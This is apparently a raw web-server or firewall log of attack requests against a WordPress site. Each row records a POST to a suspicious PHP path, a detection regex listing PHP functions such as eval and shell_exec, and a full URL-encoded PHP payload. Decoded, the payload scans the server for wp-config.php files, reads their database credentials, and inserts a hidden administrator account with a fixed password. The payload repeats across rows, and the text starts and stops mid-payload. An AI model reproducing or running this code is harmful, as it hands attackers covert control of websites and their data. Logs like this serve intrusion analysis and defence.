%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:06:09","213.209.159.254","POST","\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> urOhQZ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\naccept-encoding:gzip,deflate\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-user:?1\naccept:*\/*\nsec-fetch-dest:document\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\n\nurOhQZ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:06:26","213.209.159.254","POST","\/wp-includes\/pomo\/mo.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> HaFMzo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%2